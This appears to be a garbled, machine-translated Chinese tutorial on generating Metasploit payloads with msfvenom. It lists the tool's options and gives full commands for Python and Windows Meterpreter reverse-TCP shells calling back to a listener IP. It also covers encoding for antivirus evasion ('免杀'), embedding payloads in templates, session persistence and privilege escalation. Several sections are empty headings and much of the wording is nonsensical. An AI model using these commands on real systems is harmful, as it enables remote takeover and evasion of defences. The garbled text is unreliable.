创造必要的有效载荷
- - x86/shikata_ga_nai-i3 或差值
- 使用 Linux 生成有效载荷
- PHP 中有效装入生成
- Python 有效载荷生成
- Windows 生产有效载荷
- 第一,通过一个可信的程序,可以极大地提高本届会议的存活能力。
- 档案 Python 仍留在地上
常见参数
-l and --list 列表显示选定模块的所有可用资源的列表。所有模块类型的示例包括有效载荷、代码、点点等等。
-p, --payload < payload> 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的
-f, --format < format> 指定输出格式
- e, --encoder 指定要使用的编码器(编码器),要使用的编码器,如果不指定 -e 或 -b,则输出原始有效载荷。
-a, --arch < architecture> 指定payload的目标架构,例如x86 还是 x64 还是 x86_64
-o, --out < path> 指定创建好的payload的存放位置
-b, --bad-chars < list> 设定规避字符集,指定需要过滤的坏字符。例如:不使用 ‘x0f’、‘x00’
-n, --nopsled < length> 为payload预先指定一个NOP滑动长度
-s, --space < length> 设定有效攻击荷载的最大长度,就是文件大小
-i, --iterations < count> 指定payload的编码次数
-c, --add-code < path> 指定一个附加的win32 shellcode文件
-x, --template < path> 指定一个自定义的可执行文件作为模板,并将payload嵌入其中
-k -- -- 持续采取措施保障模板程序,作为单独程序注射有效载荷执行
-v, --var-name < value> 指定一个自定义的变量,以确定输出格式
- t, -- 超时等待秒后才能从Stdin读取有效载荷(默认值为30,0,表示已禁用)。
显示有 -h 和 -h help 的帮助选项
–platform < platform> 指定payload的目标平台
创造必要的有效载荷
异或 编码 免杀
msfvenom-l平台支持平台平台
- x86/shikata_ga_nai-i3 或差值
使用 Linux 生成有效载荷
监听
执行
./yui.elf
PHP 中有效装入生成
生成
监听
执行
Python 有效载荷生成
msfvenom -p python/meterpreter_reverse_tcp lhost=192.168.226.142 lport=22441 -f raw -o /home/kali/Desktop/shell.py
监听
Windows 生产有效载荷
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.226.142 lport=22441-f exe -o /home/kali/Desktop/shell.exe
background
sessions -i interactive
第一,通过一个可信的程序,可以极大地提高本届会议的存活能力。
- 提权
- 通过一个可信的程序,可以极大地提高本届会议的存活能力。
- 提权
档案 Python 仍留在地上
